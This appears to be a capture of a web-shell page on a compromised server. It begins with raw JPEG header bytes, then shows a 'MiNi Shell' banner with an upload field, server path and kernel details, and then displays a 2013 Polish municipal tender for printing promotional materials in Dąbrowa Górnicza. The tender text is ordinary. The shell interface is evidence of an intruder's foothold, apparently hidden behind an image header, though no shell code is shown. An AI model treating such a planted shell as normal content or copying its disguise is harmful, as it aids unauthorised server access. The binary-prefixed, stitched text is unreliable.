JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130301/85228-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza
I.  Wykonanie ulotek, plakatów, zaproszeń, informatorów, broszur,  dyplomów,  kalendarzy, pocztówek i kartek świątecznych
II. Wykonanie materiałów reklamowych na billboardy</b><br>
<b>Numer ogłoszenia: 85228 - 2013; data zamieszczenia: 01.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza
I.  Wykonanie ulotek, plakatów, zaproszeń, informatorów, broszur,  dyplomów,  kalendarzy, pocztówek i kartek świątecznych
II. Wykonanie materiałów reklamowych na billboardy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.). 
2. Zamawiający dopuszcza składanie ofert na zadanie I i (-lub) zadanie II.

3. Przedmiotem zamówienia są usługi obejmujące:
3.1. Zadanie  I: Wykonanie ulotek, plakatów, zaproszeń, informatorów, broszur, dyplomów, kalendarzy, pocztówek i kartek świątecznych

1.Projekt i druk plakatów
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

2.Projekt i druk brulionu  w okładce
szacowany nakład: 1 000 szt.
Format A5
Objętość: 100 kartek w bloczku
Środek: kolor 1+0, papier offset min. 80g
Okładka: kolor 4+0, papier kreda błysk min. 150g
Plecki: białe, bez nadruku, karton jednostronnie powlekany min. 250g
Klejenie po krótkim boku
częstotliwość dostawy - jednorazowo termin wykonania projektu brulionu od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 5 dni,
termin wykonania i dostarczenia do Zamawiającego brulionów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni,  

3.Projekt i druk ulotki - Dąbrowski Rozkład Jazdy
szacowany nakład 1000 sztuk  x 10 edycji
szacowana ilość edycji - 10 edycji (każda po 1000 sztuk)
format 100mmx210mm 
kolor 4+4 
papier kreda min. 135g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego ulotek liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni     

4.Projekt i druk plakatu - Dąbrowski Rozkład Jazdy
szacowany nakład 1 sztuka x 10 edycji
szacowana ilość edycji - 10 edycji (każda po 1 sztuce)
format 153cm x180cm
kolor 4+0
papier prezentacyjny min. 140 g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni  

5.Projekt i druk plakatu - Dąbrowski Rozkład Jazdy
szacowany nakład 1 sztuka x 10 edycji
szacowana ilość edycji - 10 edycji (każda po 1 sztuce)
format B1
kolor 4+0
papier prezentacyjny min. 140 g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

6.Projekt i druk plakatów 
szacowany nakład 1 sztuka x 7 edycji
szacowana ilość edycji - 7 edycji (każda po 1 sztuce)
format 153cm x180cm
kolor 4+0
papier prezentacyjny min. 140 g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

7.Projekt i druk kalendarza 13 planszowego
szacowany nakład - 500 sztuk
format A2
podkładka kartonowa,
oprawa spiralna,
okładka min.300 g z laminowaniem błysk kolor  1+ 0,
środek 12 kart kreda błysk min. 170 g.
kolor pełny 4+0
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 4 dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż  10 dni 

8.Projekt i druk kalendarza trójdzielnego 
szacowany nakład 700 szt.
wymiar kalendarza 320x855mm 
wymiar główki 320x220cm 
główka - kolor 4+0, folia błysk, główka oprawiona z efektem wypukłości 
plecki - karton jednostronnie powlekany min. 250g, kolor 4+0
kalendarium: wymiar: 290x135mm, kolor 2+0, papier offset min. 80g 
zawieszka do zamocowania 
pasek z przesuwnym okienkiem
biała koperta z kartonu
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

9.Projekt i druk kalendarza planszowego
szacowany nakład 700 sztuk
format B1
kolor 4+0
papier kreda min. 200 g błysk
folia błysk jednostronnie
listwy srebrne góra-dół z zawieszką po krótszym boku
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni  

10.Projekt i druk kartek świątecznych - Boże Narodzenie
szacowany nakład 400 szt.
format 210 x 200 mm składane po długim boku
Orientacja pionowa
Kolor 4+4
Papier kreda mat min. 300g
Folia mat jednostronnie 
Lakier UV wybiórczo jednostronnie
Koperta ozdobna
częstotliwość dostawy - jednorazowo
termin wykonania projektu kartki  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kartek liczony od dnia zaakceptowania projektu - nie dłużej niż  4  dni

11.Projekt i druk kartek świątecznych - Wielkanoc
szacowany nakład 400 szt.
format 210 x 200 mm składane po długim boku
Orientacja pionowa
Kolor 4+4
Papier kreda mat min. 300g
Folia mat jednostronnie 
Lakier UV wybiórczo jednostronnie
Koperta ozdobna
częstotliwość dostawy - jednorazowo
termin wykonania projektu kartki  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kartek liczony od dnia zaakceptowania projektu - nie dłużej niż  4  dni

12.Projekt i druk kartki pocztowej
szacowany nakład 4 x 250 sztuk
4 różne projekty
format 105x148 mm - standardowy format karty pocztowej
kolor 4+4
papier min. 250g sztywny karton, dwustronnie bielony - folia błyszcząca 1-stronna
częstotliwość dostawy - jednorazowo dla każdego projektu
termin wykonania projektów kartek  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kartek liczony od dnia zaakceptowania projektu - nie dłużej niż  3  dni

13. Projekt i druk zaproszeń
szacowany nakład  300 szt.
format A4 składane na 3 części
kolor 4+4
papier kreda min. 250g, folia matowa, UV wybiórczo na całości
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż 3 dni

14. Projekt i druk plakatów 
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni  

15. Projekt i druk zaproszeń
szacowany nakład  400 szt.
format A4 składane na 3 części
kolor 4+4
papier kreda min. 250g, folia matowa, UV wybiórczo na całości
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż 3 dni
  
16. Projekt i druk ulotek - Dębowy Maj Festiwal
szacowany nakład 3000 szt.
format A3 składana do formatu 297 X 105
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

17. Projekt i druk plakatu - Dębowy Maj Festiwal
szacowany nakład  300 szt.
format B1
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

18.Projekt i druk ulotek 
szacowany nakład 800 szt.
format A5 
kolor 4+4
papier offset min. 100g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
  
19.Projekt i druk ulotek 
szacowany nakład 800 szt.
format A5
kolor 4+4
papier offset min. 100g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

20. Projekt i druk informatora o aktywności w mieście
szacowany nakład: 4000 szt.
format A5
objętość: 32 strony + okładka
środek: kolor 4+4, papier kreda błysk min. 150 g
okładka: kolor 4+4, papier kreda mat min. 300g, lakier offsetowy jednostronnie
oprawa: szycie zeszytowe na 2 zszywki
częstotliwość dostawy - jednorazowo
termin wykonania projektu informatora liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 10 dni
termin wykonania i dostarczenia informatorów do Zamawiającego liczony od dnia zaakceptowania projektu -- nie dłużej niż 7 dni

21.Projekt i druk plakatu - VII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka
szacowany nakład 100 sztuk
format B2
pełny kolor jednostronnie
papier kreda min. 170 g błysk
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni

22.Projekt i druk zaproszeń - VII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka
szacowany nakład  700 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 300 g
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż  7 dni

23.Projekt i druk dyplomów - VII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka
szacowany nakład 400 sztuk
format A4
pełny kolor jednostronnie
papier  kreda min. 300 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu dyplomu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego dyplomów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni  

24.Projekt i druk plakatu - VII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka
szacunkowy nakład: 300 sztuk wersja angielska, 300 sztuk wersja polska
format B2
pełny kolor jednostronnie
papier kreda min. 170 g błysk
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni 

25.Projekt i druk plakatów - Dni Dąbrowy Górniczej
szacunkowy nakład 200 sztuk
format B1
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni  

26.Projekt i druk plakatów - Dożynki Miejskie i Pożegnanie Lata
szacunkowy nakład 200 sztuk
format B2
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

27.Projekt i druk zaproszeń - Dożynki Miejskie
szacowany nakład 350 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 200 g,
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni 

28.Projekt i druk Quick-button
szacowany nakład 500 sztuk
średnica 55 mm
nadruk w pełnym kolorze 4+0
częstotliwość dostawy - jednorazowo
termin wykonania projektu quickbuttonów  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego quickbuttonów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni

29.Projekt i druk publikacji Dożynki 2013
szacowany nakład 1000 szt.
format A5
objętość: 16 str. + okładka
okładka: papier kreda błysk min. 300g, kolor 4+4
środek: papier kreda błysk min. 150g, kolor 4+4
szycie zeszytowe, częstotliwość dostawy - jednorazowo
termin wykonania projektu publikacji liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia  publikacji do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż  2 dni

30.Projekt i druk plakatu Dąbrowski Kiermasz Świąteczny
szacowany nakład: 150szt.
format B2
kolor 4+0
papier kreda min. 150g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  7   dni  

31.Projekt i druk zaproszeń Koncert Noworoczny
szacowany nakład 300 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 200 g
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż  7  dni
   
32.Projekt i druk zaproszeń 11 listopada
szacowany nakład 200 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 250 g,
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 14 dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni
  
33.Projekt i druk plakatów 11 listopada
szacowany nakład - 150 sztuk
format B2
papier - offset min.  100g
kolor 4+0
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 14 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  7 dni
  
34.Projekt i druk kalendarza - VIII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka
szacowany nakład 400 sztuk
format B1
kolor 4+0
papier kreda min. 200 g błysk
folia błysk jednostronnie
listwy srebrne góra-dół z zawieszką po krótszym boku
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

35.Projekt i druk ulotek -  Zagłębie Wood
szacowany nakład 3000 szt.
format A3 składana do formatu 297 X 105
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

36.Projekt i druk plakatu -  Zagłębie Wood
szacunkowy nakład 300 sztuk
format B1
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

37.Projekt i druk plakatów na Mistrzostwa Polski MTB 
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset  min.  100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni
  
38. Projekt i druk ulotek -  Mistrzostwa Polski MTB 
szacowany nakład 5000 szt.
format A3 składana do formatu 297 X 105
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
  
39. Projekt i druk ulotek -  Tour de Pologne
szacowany nakład 1000 szt.
format A4 składana na pół
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
  
40.Projekt i druk plakatów związanych z organizacją imprez sportowych w mieście
szacowany nakład 600 szt.
format B2
kolor 4+0
papier kreda min. 120 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3  dni
  
41.Projekt i druk plakatów Akcja Lato w mieście 2013
szacowany nakład 300 szt
format B2 (70cmx50cm)
kolor 4+0
papier kreda błysk min.  135g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni  
42.Projekt i druk plakatów Akcja Zima w mieście
szacowany nakład 300 szt
format B2 (70cmx50cm)
kolor 4+0
papier kreda błysk min. 135g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni 
43.Projekt i druk certyfikatów dla uczestników biegów Polska biega
szacowany nakład 400 szt.
format A5
kolor 4+0
papier kreda min. 250 g
częstotliwość dostawy jednorazowo
termin wykonania projektu certyfikatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia certyfikatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

44.Projekt i druk zaproszeń 
szacowany nakład 200 szt.
format A4 składane na trzy części
kolor 4+4
papier kreda min. 250 g
częstotliwość dostawy jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia zaproszeń do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 4 dni

45.Projekt i druk plakatów  Dąbrowa Górnicza mówi NIE  uzależnieniom
szacowany nakład 250 szt.
format A2 
kolor 4+0
papier kreda min. 150 g
częstotliwość dostawy w trzech terminach
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

46.Projekt i druk broszur informacyjnych
szacowany nakład 1000 szt.
format A4 składane na trzy części
kolor 4+4
papier kreda  błysk min. 135 g
częstotliwość dostawy jednorazowo
termin wykonania projektu broszury  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia  broszur  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

47.Projekt i druk informatorów- XXII Ogólnopolski Przegląd Abstynenckiej  Twórczości Art.  Zamczysko 2013 
szacowany nakład 600 szt.
format A5 składane i zszywane w książeczkę
objętość: 16 str. +  4 strony okładka
kolor 1+1 
papier offsetowy min. 80 g
okładka : papier offsetowy min.80 g , foliowana, kolor 4+4, zszycie zeszytowe
częstotliwość dostawy jednorazowo
termin wykonania projektu c informatora  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia  informatorów  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

48.Projekt i druk  broszury Możesz zapanować nad zagrożeniem
szacowany nakład  1000 szt.
format A5 
objętość: 12 kart/24 strony, druk dwustronny + okładka
kolor pełny
papier offsetowy min. 80 g
okładka : papier kreda min.200 g , zszycie zeszytowe, full kolor 
częstotliwość dostawy jednorazowo
termin wykonania projektu  broszury  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 10 dni
termin wykonania i dostarczenia  broszur  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 30 dni

49.Projekt i druk plakatów  z okazji obchodów Dnia Ziemi
szacowany nakład  80 szt.
format A3 
kolor pełny
papier offsetowy min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania projektu  plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
